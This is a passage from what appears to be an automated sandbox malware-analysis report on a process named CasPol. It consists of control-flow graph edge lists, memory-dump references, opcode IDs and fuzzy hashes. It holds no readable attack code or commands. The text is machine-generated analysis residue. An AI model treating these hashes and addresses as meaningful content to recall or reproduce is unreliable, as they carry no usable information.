10996->11209 11011 1007f20-1007fe6 11159 1007fe6 call 1c778c47 11011->11159 11160 1007fe6 call 1c778ce7 11011->11160 11161 1007fe6 call 1c778c50 11011->11161 11020 1007fec-1008038 11023 1008331-1008342 11020->11023 11024 100803e-1008061 11020->11024 11027 1008348-100834f 11023->11027 11028 100869c-10086a3 11023->11028 11036 1008067-10080d9 11024->11036 11037 1008319-100832e 11024->11037 11031 1008355-1008363 11027->11031 11032 10083e6-10083ed 11027->11032 11029 1008725-1008740 11028->11029 11030 10086a9-100871a 11028->11030 11030->11029 11206 1008369 call 1c77a6f0 11031->11206 11207 1008369 call 1c77a700 11031->11207 11034 10083f3-1008538 call 1005aa8 call 10056b0 11032->11034 11035 100855d-1008564 11032->11035 11034->11028 11035->11028 11038 100856a-100867f call 1005aa8 call 10056b0 call 10056f8 11035->11038 11063 1008301-1008313 11036->11063 11064 10080df-10080e6 11036->11064 11045 100832f 11037->11045 11038->11028 11045->11045 11053 100836f-10083a9 11167 10083af call 1c77b9c0 11053->11167 11168 10083af call 1c77b91f 11053->11168 11063->11036 11063->11037 11068 10080ec-10081fa 11064->11068 11069 10081ff-100822a 11064->11069 11068->11063 11069->11063 11074 1008230-10082d8 11069->11074 11073 10083b5 11073->11028 11074->11063 11150->10948 11151->10948 11152->10873 11153->10873 11154->10873 11156->10876 11157->10876 11158->10876 11159->11020 11160->11020 11161->11020 11163->10955 11164->10955 11165->10955 11166->10955 11167->11073 11168->11073 11169->10915 11170->10915 11171->10915 11172->10882 11173->10882 11174->10882 11175->10885 11176->10885 11177->10996 11178->10996 11179->10996 11180->10996 11181->10996 11182->10964 11183->10964 11184->10964 11185->10851 11186->10851 11187->10892 11188->10892 11189->10892 11190->10892 11191->10892 11192->10855 11193->10855 11194->10855 11196->10936 11197->10936 11198->10972 11199->10972 11200->10864 11201->10864 11202->10864 11203->10864 11204->10864 11206->11053 11207->11053 11208->11011 11209->11011 11211->10867 11212->10867 11213->10867 11214->10867
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19733537398.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1000000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 677b9e0d739f71569ec4550591fd582456854213c12b4713771fad501a6a6427
                                                                                    • Instruction ID: 23b7dd3f6b5fc8a243633503c82565c734f58820e4351929a44796d1acef4855
                                                                                    • Opcode Fuzzy Hash: 677b9e0d739f71569ec4550591fd582456854213c12b4713771fad501a6a6427
                                                                                    • Instruction Fuzzy Hash: 5D323774A04228CFCB65EF70C888B9DB7B6BF88205F5081EAD54AA3744DB359E85CF44
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0100743E Relevance: 2.0, APIs: 1, Instructions: 489libraryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 11215 100743e-1007462 call 1006288 call 1006418 11551 1007462 call 156ac37 11215->11551 11552 1007462 call 156ad47 11215->11552 11553 1007462 call 156ace8 11215->11553 11221 1007468-1007528 11563 1007528 call 156b6a5 11221->11563 11564 1007528 call 156b140 11221->11564 11565 1007528 call 156b0e0 11221->11565 11566 1007528 call 156b651 11221->11566 11567 1007528 call 156b358 11221->11567 11230 100752e-1007564 11569 1007564 call 1c7710f7 11230->11569 11570 1007564 call 1c7715b3 11230->11570 11571 1007564 call 1c771bcf 11230->11571 11572 1007564 call 1c771108 11230->11572 11233 100756a-10075e5 11576 10075e5 call 1c771e27 11233->11576 11577 10075e5 call 1c771d68 11233->11577 11578 10075e5 call 1c771dc8 11233->11578 11239 10075eb-100762a 11520 100762a call 1c771f47 11239->11520 11521 100762a call 1c771e8a 11239->11521 11522 100762a call 1c771ee8 11239->11522 11242 1007630-10076ba 11528 10076ba call 1c772450 11242->11528 11529 10076ba call 1c7723b0 11242->11529 11530 10076ba call 1c7724af 11242->11530 11248 10076c0-1007702 11534 1007702 call 1c772570 11248->11534 11535 1007702 call 1c772510 11248->11535 11251 1007708-1007781 11546 1007787 call 1c7734c1 11251->11546 11547 1007787 call 1c773660 11251->11547 11548 1007787 call 1c7734bf 11251->11548 11549 1007787 call 1c7736dd 11251->11549 11550 1007787 call 1c773568 11251->11550 11258 100778d-10078db call 1c7737a8 * 5 LdrInitializeThunk 11279 10078e1-1007905 11258->11279 11280 1007c02 11258->11280 11286 100790b 11279->11286 11287 1007a5e-1007a82 11279->11287 11531 1007c02 call 1c773cc9 11280->11531 11532 1007c02 call 1c773cd8 11280->11532 11533 1007c02 call 1c773dc8 11280->11533 11281 1007c08-1007c92 11554 1007c92 call 1c7745e0 11281->11554 11555 1007c92 call 1c774580 11281->11555 11286->11287 11288 1007911-1007a59 11286->11288 11294 1007a84 11287->11294 11295 1007a88-1007a8a 11287->11295 11288->11280 11298 1007a86 11294->11298 11299 1007a8c 11294->11299 11300 1007a91-1007abb 11295->11300 11298->11295 11299->11300 11309 1007ac1-1007ac3 11300->11309 11310 1007abd 11300->11310 11302 1007c98-1007cda 11573 1007cda call 1c7749fa 11302->11573 11574 1007cda call 1c774a08 11302->11574 11313 1007aca-1007ad0 11309->11313 11311 1007ac5 11310->11311 11312 1007abf 11310->11312 11311->11313 11312->11309 11313->11280 11315 1007ad6-1007bd9 11313->11315 11314 1007ce0-1007d22 11523 1007d22 call 1c774f27 11314->11523 11524 1007d22 call 1c7749fa 11314->11524 11525 1007d22 call 1c774e28 11314->11525 11526 1007d22 call 1c774a08 11314->11526 11315->11280 11321 1007d28-1007d6a 11543 1007d6a call 1c775047 11321->11543 11544 1007d6a call 1c774fe8 11321->11544 11545 1007d6a call 1c774f88 11321->11545 11330 1007d70-1007db2 11557 1007db2 call 1c7750a8 11330->11557 11558 1007db2 call 1c775108 11330->11558 11338 1007db8-1007e8a 11538 1007e8a call 1c776507 11338->11538 11539 1007e8a call 1c776096 11338->11539 11540 1007e8a call 1c7760a0 11338->11540 11541 1007e8a call 1c7763a9 11338->11541 11542 1007e8a call 1c7761e8 11338->11542 11362 1007e90-1007f1a 11559 1007f1a call 1c7768a0 11362->11559 11560 1007f1a call 1c776890 11362->11560 11377 1007f20-1007fe6 11516 1007fe6 call 1c778c47 11377->11516 11517 1007fe6 call 1c778ce7 11377->11517 11518 1007fe6 call 1c778c50 11377->11518 11386 1007fec-1008038 11389 1008331-1008342 11386->11389 11390 100803e-1008061 11386->11390 11393 1008348-100834f 11389->11393 11394 100869c-10086a3 11389->11394 11402 1008067-10080d9 11390->11402 11403 1008319-100832e 11390->11403 11397 1008355-1008363 11393->11397 11398 10083e6-10083ed 11393->11398 11395 1008725-1008740 11394->11395 11396 10086a9-100871a 11394->11396 11396->11395 11561 1008369 call 1c77a6f0 11397->11561 11562 1008369 call 1c77a700 11397->11562 11400 10083f3-1008538 call 1005aa8 call 10056b0 11398->11400 11401 100855d-1008564 11398->11401 11400->11394 11401->11394 11404 100856a-100867f call 1005aa8 call 10056b0 call 10056f8 11401->11404 11429 1008301-1008313 11402->11429 11430 10080df-10080e6 11402->11430 11411 100832f 11403->11411 11404->11394 11411->11411 11419 100836f-10083a9 11536 10083af call 1c77b9c0 11419->11536 11537 10083af call 1c77b91f 11419->11537 11429->11402 11429->11403 11434 10080ec-10081fa 11430->11434 11435 10081ff-100822a 11430->11435 11434->11429 11435->11429 11440 1008230-10082d8 11435->11440 11439 10083b5 11439->11394 11440->11429 11516->11386 11517->11386 11518->11386 11520->11242 11521->11242 11522->11242 11523->11321 11524->11321 11525->11321 11526->11321 11528->11248 11529->11248 11530->11248 11531->11281 11532->11281 11533->11281 11534->11251 11535->11251 11536->11439 11537->11439 11538->11362 11539->11362 11540->11362 11541->11362 11542->11362 11543->11330 11544->11330 11545->11330 11546->11258 11547->11258 11548->11258 11549->11258 11550->11258 11551->11221 11552->11221 11553->11221 11554->11302 11555->11302 11557->11338 11558->11338 11559->11377 11560->11377 11561->11419 11562->11419 11563->11230 11564->11230 11565->11230 11566->11230 11567->11230 11569->11233 11570->11233 11571->11233 11572->11233 11573->11314 11574->11314 11576->11239 11577->11239 11578->11239
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19733537398.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1000000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: a762a1b47f15d2a83611e0fc753847f1ffd36df617891e7e37bf4fa0ba3a3999
                                                                                    • Instruction ID: f3b19ae8bf5305fb7eac7dded50879f14ae013db95d13c8d07da0514ecd91f08
                                                                                    • Opcode Fuzzy Hash: a762a1b47f15d2a83611e0fc753847f1ffd36df617891e7e37bf4fa0ba3a3999
                                                                                    • Instruction Fuzzy Hash: 9A322774A04228CFCB65DF70C888B9DB7B6BF88205F5081EAD54AA3744DB359E85CF44
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01007483 Relevance: 2.0, APIs: 1, Instructions: 482libraryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 11579 1007483-1007528 call 1006288 call 1006418 11891 1007528 call 156b6a5 11579->11891 11892 1007528 call 156b140 11579->11892 11893 1007528 call 156b0e0 11579->11893 11894 1007528 call 156b651 11579->11894 11895 1007528 call 156b358 11579->11895 11591 100752e-1007564 11897 1007564 call 1c7710f7 11591->11897 11898 1007564 call 1c7715b3 11591->11898 11899 1007564 call 1c771bcf 11591->11899 11900 1007564 call 1c771108 11591->11900 11594 100756a-10075e5 11904 10075e5 call 1c771e27 11594->11904 11905 10075e5 call 1c771d68 11594->11905 11906 10075e5 call 1c771dc8 11594->11906 11600 10075eb-100762a 11911 100762a call 1c771f47 11600->11911 11912 100762a call 1c771e8a 11600->11912 11913 100762a call 1c771ee8 11600->11913 11603 1007630-10076ba 11919 10076ba call 1c772450 11603->11919 11920 10076ba call 1c7723b0 11603->11920 11921 10076ba call 1c7724af 11603->11921 11609 10076c0-1007702 11925 1007702 call 1c772570 11609->11925 11926 1007702 call 1c772510 11609->11926 11612 1007708-1007781 11877 1007787 call 1c7734c1 11612->11877 11878 1007787 call 1c773660 11612->11878 11879 1007787 call 1c7734bf 11612->11879 11880 1007787 call 1c7736dd 11612->11880 11881 1007787 call 1c773568 11612->11881 11619 100778d-10078db call 1c7737a8 * 5 LdrInitializeThunk 11640 10078e1-1007905 11619->11640 11641 1007c02 11619->11641 11647 100790b 11640->11647 11648 1007a5e-1007a82 11640->11648 11922 1007c02 call 1c773cc9 11641->11922 11923 1007c02 call 1c773cd8 11641->11923 11924 1007c02 call 1c773dc8 11641->11924 11642 1007c08-1007c92 11882 1007c92 call 1c7745e0 11642->11882 11883 1007c92 call 1c774580 11642->11883 11647->11648 11649 1007911-1007a59 11647->11649 11655 1007a84 11648->11655 11656 1007a88-1007a8a 11648->11656 11649->11641 11659 1007a86 11655->11659 11660 1007a8c 11655->11660 11661 1007a91-1007abb 11656->11661 11659->11656 11660->11661 11670 1007ac1-1007ac3 11661->11670 11671 1007abd 11661->11671 11663 1007c98-1007cda 11901 1007cda call 1c7749fa 11663->11901 11902 1007cda call 1c774a08 11663->11902 11674 1007aca-1007ad0 11670->11674 11672 1007ac5 11671->11672 11673 1007abf 11671->11673 11672->11674 11673->11670 11674->11641 11676 1007ad6-1007bd9 11674->11676 11675 1007ce0-1007d22 11914 1007d22 call 1c774f27 11675->11914 11915 1007d22 call 1c7749fa 11675->11915 11916 1007d22 call 1c774e28 11675->11916 11917 1007d22 call 1c774a08 11675->11917 11676->11641 11682 1007d28-1007d6a 11934 1007d6a call 1c775047 11682->11934 11935 1007d6a call 1c774fe8 11682->11935 11936 1007d6a call 1c774f88 11682->11936 11691 1007d70-1007db2 11885 1007db2 call 1c7750a8 11691->11885 11886 1007db2 call 1c775108 11691->11886 11699 1007db8-1007e8a 11929 1007e8a call 1c776507 11699->11929 11930 1007e8a call 1c776096 11699->11930 11931 1007e8a call 1c7760a0 11699->11931 11932 1007e8a call 1c7763a9 11699->11932 11933 1007e8a call 1c7761e8 11699->11933 11723 1007e90-1007f1a 11887 1007f1a call 1c7768a0 11723->11887 11888 1007f1a call 1c776890 11723->11888 11738 1007f20-1007fe6 11907 1007fe6 call 1c778c47 11738->11907 11908 1007fe6 call 1c778ce7 11738->11908 11909 1007fe6 call 1c778c50 11738->11909 11747 1007fec-1008038 11750 1008331-1008342 11747->11750 11751 100803e-1008061 11747->11751 11754 1008348-100834f 11750->11754 11755 100869c-10086a3 11750->11755 11763 1008067-10080d9 11751->11763 11764 1008319-100832e 11751->11764 11758 1008355-1008363 11754->11758 11759 10083e6-10083ed 11754->11759 11756 1008725-1008740 11755->11756 11757 10086a9-100871a 11755->11757 11757->11756 11889 1008369 call 1c77a6f0 11758->11889 11890 1008369 call 1c77a700 11758->11890 11761 10083f3-1008538 call 1005aa8 call 10056b0 11759->11761 11762 100855d-1008564 11759->11762 11761->11755 11762->11755 11765 100856a-100867f call 1005aa8 call 10056b0 call 10056f8 11762->11765 11790 1008301-1008313 11763->11790 11791 10080df-10080e6 11763->11791 11772 100832f 11764->11772 11765->11755 11772->11772 11780 100836f-10083a9 11927 10083af call 1c77b9c0 11780->11927 11928 10083af call 1c77b91f 11780->11928 11790->11763 11790->11764 11795 10080ec-10081fa 11791->11795 11796 10081ff-100822a 11791->11796 11795->11790 11796->11790 11801 1008230-10082d8 11796->11801 11800 10083b5 11800->11755 11801->11790 11877->11619 11878->11619 11879->11619 11880->11619 11881->11619 11882->11663 11883->11663 11885->11699 11886->11699 11887->11738 11888->11738 11889->11780 11890->11780 11891->11591 11892->11591 11893->11591 11894->11591 11895->11591 11897->11594 11898->11594 11899->11594 11900->11594 11901->11675 11902->11675 11904->11600 11905->11600 11906->11600 11907->11747 11908->11747 11909->11747 11911->11603 11912->11603 11913->11603 11914->11682 11915->11682 11916->11682 11917->11682 11919->11609 11920->11609 11921->11609 11922->11642 11923->11642 11924->11642 11925->11612 11926->11612 11927->11800 11928->11800 11929->11723 11930->11723 11931->11723 11932->11723 11933->11723 11934->11691 11935->11691 11936->11691
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19733537398.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1000000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 409d90286bfd07291063d94845666557cf4c93229c59141e5d51498597157801
                                                                                    • Instruction ID: dbbafc563cdff25663e49ffbd2aae5ed779c36a2769c6cf19179bd1870f8decf
                                                                                    • Opcode Fuzzy Hash: 409d90286bfd07291063d94845666557cf4c93229c59141e5d51498597157801
                                                                                    • Instruction Fuzzy Hash: 67223874A04228CFCB65DF70C888B9DB7B6BF88205F6081EAD54AA3744DB359E85CF44
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 010074C8 Relevance: 2.0, APIs: 1, Instructions: 475libraryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 11937 10074c8-1007528 call 1006288 call 1006418 12232 1007528 call 156b6a5 11937->12232 12233 1007528 call 156b140 11937->12233 12234 1007528 call 156b0e0 11937->12234 12235 1007528 call 156b651 11937->12235 12236 1007528 call 156b358 11937->12236 11946 100752e-1007564 12238 1007564 call 1c7710f7 11946->12238 12239 1007564 call 1c7715b3 11946->12239 12240 1007564 call 1c771bcf 11946->12240 12241 1007564 call 1c771108 11946->12241 11949 100756a-10075e5 12250 10075e5 call 1c771e27 11949->12250 12251 10075e5 call 1c771d68 11949->12251 12252 10075e5 call 1c771dc8 11949->12252 11955 10075eb-100762a 12253 100762a call 1c771f47 11955->12253 12254 100762a call 1c771e8a 11955->12254 12255 100762a call 1c771ee8 11955->12255 11958 1007630-10076ba 12269 10076ba call 1c772450 11958->12269 12270 10076ba call 1c7723b0 11958->12270 12271 10076ba call 1c7724af 11958->12271 11964 10076c0-1007702 12272 1007702 call 1c772570 11964->12272 12273 1007702 call 1c772510 11964->12273 11967 1007708-1007781 12282 1007787 call 1c7734c1 11967->12282 12283 1007787 call 1c773660 11967->12283 12284 1007787 call 1c7734bf 11967->12284 12285 1007787 call 1c7736dd 11967->12285 12286 1007787 call 1c773568 11967->12286 11974 100778d-10078db call 1c7737a8 * 5 LdrInitializeThunk 11995 10078e1-1007905 11974->11995 11996 1007c02 11974->11996 12002 100790b 11995->12002 12003 1007a5e-1007a82 11995->12003 12260 1007c02 call 1c773cc9 11996->12260 12261 1007c02 call 1c773cd8 11996->12261 12262 1007c02 call 1c773dc8 11996->12262 11997 1007c08-1007c92 12290 1007c92 call 1c7745e0 11997->12290 12291 1007c92 call 1c774580 11997->12291 12002->12003 12004 1007911-1007a59 12002->12004 12010 1007a84 12003->12010 12011 1007a88-1007a8a 12003->12011 12004->11996 12014 1007a86 12010->12014 12015 1007a8c 12010->12015 12016 1007a91-1007abb 12011->12016 12014->12011 12015->12016 12025 1007ac1-1007ac3 12016->12025 12026 1007abd 12016->12026 12018 1007c98-1007cda 12247 1007cda call 1c7749fa 12018->12247 12248 1007cda call 1c774a08 12018->12248 12029 1007aca-1007ad0 12025->12029 12027 1007ac5 12026->12027 12028 1007abf 12026->12028 12027->12029 12028->12025 12029->11996 12031 1007ad6-1007bd9 12029->12031 12030 1007ce0-1007d22 12263 1007d22 call 1c774f27 12030->12263 12264 1007d22 call 1c7749fa 12030->12264 12265 1007d22 call 1c774e28 12030->12265 12266 1007d22 call 1c774a08 12030->12266 12031->11996 12037 1007d28-1007d6a 12274 1007d6a call 1c775047 12037->12274 12275 1007d6a call 1c774fe8 12037->12275 12276 1007d6a call 1c774f88 12037->12276 12046 1007d70-1007db2 12288 1007db2 call 1c7750a8 12046->12288 12289 1007db2 call 1c775108 12046->12289 12054 1007db8-1007e8a 12277 1007e8a call 1c776507 12054->12277 12278 1007e8a call 1c776096 12054->12278 12279 1007e8a call 1c7760a0 12054->12279 12280 1007e8a call 1c7763a9 12054->12280 12281 1007e8a call 1c7761e8 12054->12281 12078 1007e90-1007f1a 12242 1007f1a call 1c7768a0 12078->12242 12243 1007f1a call 1c776890 12078->12243 12093 1007f20-1007fe6 12256 1007fe6 call 1c778c47 12093->12256 12257 1007fe6 call 1c778ce7 12093->12257 12258 1007fe6 call 1c778c50 12093->12258 12102 1007fec-1008038 12105 1008331-1008342 12102->12105 12106 100803e-1008061 12102->12106 12109 1008348-100834f 12105->12109 12110 100869c-10086a3 12105->12110 12118 1008067-10080d9 12106->12118 12119 1008319-100832e 12106->12119 12113 1008355-1008363 12109->12113 12114 10083e6-10083ed 12109->12114 12111 1008725-1008740 12110->12111 12112 10086a9-100871a 12110->12112 12112->12111 12244 1008369 call 1c77a6f0 12113->12244 12245 1008369 call 1c77a700 12113->12245 12116 10083f3-1008538 call 1005aa8 call 10056b0 12114->12116 12117 100855d-1008564 12114->12117 12116->12110 12117->12110 12120 100856a-100867f call 1005aa8 call 10056b0 call 10056f8 12117->12120 12145 1008301-1008313 12118->12145 12146 10080df-10080e6 12118->12146 12127 100832f 12119->12127 12120->12110 12127->12127 12135 100836f-10083a9 12267 10083af call 1c77b9c0 12135->12267 12268 10083af call 1c77b91f 12135->12268 12145->12118 12145->12119 12150 10080ec-10081fa 12146->12150 12151 10081ff-100822a 12146->12151 12150->12145 12151->12145 12156 1008230-10082d8 12151->12156 12155 10083b5 12155->12110 12156->12145 12232->11946 12233->11946 12234->11946 12235->11946 12236->11946 12238->11949 12239->11949 12240->11949 12241->11949 12242->12093 12243->12093 12244->12135 12245->12135 12247->12030 12248->12030 12250->11955 12251->11955 12252->11955 12253->11958 12254->11958 12255->11958 12256->12102 12257->12102 12258->12102 12260->11997 12261->11997 12262->11997 12263->12037 12264->12037 12265->12037 12266->12037 12267->12155 12268->12155 12269->11964 12270->11964 12271->11964 12272->11967 12273->11967 12274->12046 12275->12046 12276->12046 12277->12078 12278->12078 12279->12078 12280->12078 12281->12078 12282->11974 12283->11974 12284->11974 12285->11974 12286->11974 12288->12054 12289->12054 12290->12018 12291->12018
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19733537398.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1000000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: ba33f4b25990f45961c738da4d4608fb44dd20328c501e750b9352d02cb0adb5
                                                                                    • Instruction ID: 14112b7431734ddf6b4806dc1c423edc29e31e8a35a93cc4344466f00eb34265
                                                                                    • Opcode Fuzzy Hash: ba33f4b25990f45961c738da4d4608fb44dd20328c501e750b9352d02cb0adb5
                                                                                    • Instruction Fuzzy Hash: 81223974A04228CFCB65DF74C888B9DB7B6BF88205F5081EAD54AA3744DB359E85CF44
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0100750D Relevance: 2.0, APIs: 1, Instructions: 466libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19733537398.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1000000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 6cce5dfe59315df58e6d7694930f5fd76ddec8f220d41a2504744a8a37e1f39b
                                                                                    • Instruction ID: bafe3349758c0c146752c7d57408ff892d7854d1d21705d584a6748da32e6bfe
                                                                                    • Opcode Fuzzy Hash: 6cce5dfe59315df58e6d7694930f5fd76ddec8f220d41a2504744a8a37e1f39b
                                                                                    • Instruction Fuzzy Hash: AB224874A04228CFCB65EF70C888B9DB7B6BF88205F5081EAD54AA3744DB359E85CF54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01007549 Relevance: 2.0, APIs: 1, Instructions: 459libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19733537398.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1000000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 57639f8db01a7a1a5b7f7d3211faba3850f2f2bf79c6bf7906313c880f774572
                                                                                    • Instruction ID: 5b0bca363cd8551e03bc7b754b0418dddd4c5127261417ce3b7b44e0b78ddb70
                                                                                    • Opcode Fuzzy Hash: 57639f8db01a7a1a5b7f7d3211faba3850f2f2bf79c6bf7906313c880f774572
                                                                                    • Instruction Fuzzy Hash: 41223874A04228CFCB65EF70C888B9DB7B6BF88205F5081EAD54AA3744DB359E85CF54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01007585 Relevance: 2.0, APIs: 1, Instructions: 454libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19733537398.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1000000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 5841797ff5f424f34aad79db5fb624f8ccb93f0b7a13223bf82e89b102c425db
                                                                                    • Instruction ID: a1ac37a036c7ea063436f6b367164cbdef105b321965861c31977d751bc07014
                                                                                    • Opcode Fuzzy Hash: 5841797ff5f424f34aad79db5fb624f8ccb93f0b7a13223bf82e89b102c425db
                                                                                    • Instruction Fuzzy Hash: 38224874A04228CFCB65DF70C888B9DB7B6BF88205F6081EAD54AA3744DB359E85CF54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 010075CA Relevance: 1.9, APIs: 1, Instructions: 445libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19733537398.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1000000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 31e0707c9633a3cd8dbf8efbd11de800eee8eaec58783580036d758f49708f91
                                                                                    • Instruction ID: 0f30998029fe9a3a0f1f967e588264e8fba5a64a99c514966b5532110b8d3dca
                                                                                    • Opcode Fuzzy Hash: 31e0707c9633a3cd8dbf8efbd11de800eee8eaec58783580036d758f49708f91
                                                                                    • Instruction Fuzzy Hash: 33124874A04228CFCB65EF70C888B9DB7B6BF88205F5081EAD54A93744DB359E85CF54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01007606 Relevance: 1.9, APIs: 1, Instructions: 440libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19733537398.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1000000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: f80abad4b82d38412c07f1678f708509c4312afe29e6555ae176913aa0be99cf
                                                                                    • Instruction ID: b32f1958c3cadecddc67bbcc085c2efc2aee75a2217e0ae24f2792e004926f24
                                                                                    • Opcode Fuzzy Hash: f80abad4b82d38412c07f1678f708509c4312afe29e6555ae176913aa0be99cf
                                                                                    • Instruction Fuzzy Hash: E7124874A04228CFCB65EF70C888B9DB7B6BF88205F5081EAD54AA3744DB359E85CF54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0100764B Relevance: 1.9, APIs: 1, Instructions: 433libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19733537398.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1000000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: ac9e2c04cb009ed9f1edd475b925c5ffcfd034b24fe3afefe7faf9737a9955a6
                                                                                    • Instruction ID: 027da12bcae7e6b7daa59fac91f72843413ac81a9f6f0e7c634ad8e07ecc685c
                                                                                    • Opcode Fuzzy Hash: ac9e2c04cb009ed9f1edd475b925c5ffcfd034b24fe3afefe7faf9737a9955a6
                                                                                    • Instruction Fuzzy Hash: 07124774A04228CFCB65EF70C888B9DB7B6BF88205F5081EAD54AA3744DB359E85CF54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01007693 Relevance: 1.9, APIs: 1, Instructions: 426libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19733537398.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1000000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: be7f79d01846317d849db607f16583dbe2d5abfbd4c80f9cd4ee208e7541d21a
                                                                                    • Instruction ID: c5a306b08fd0427781e7f8ca1aa5b240a0334d7e85c9a685e11dd181282415ca
                                                                                    • Opcode Fuzzy Hash: be7f79d01846317d849db607f16583dbe2d5abfbd4c80f9cd4ee208e7541d21a
                                                                                    • Instruction Fuzzy Hash: 79124874A04228CFCB65DF70C888B9DB7B6BF88205F6081EAD54AA3744DB359E85CF54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 010076DB Relevance: 1.9, APIs: 1, Instructions: 419libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
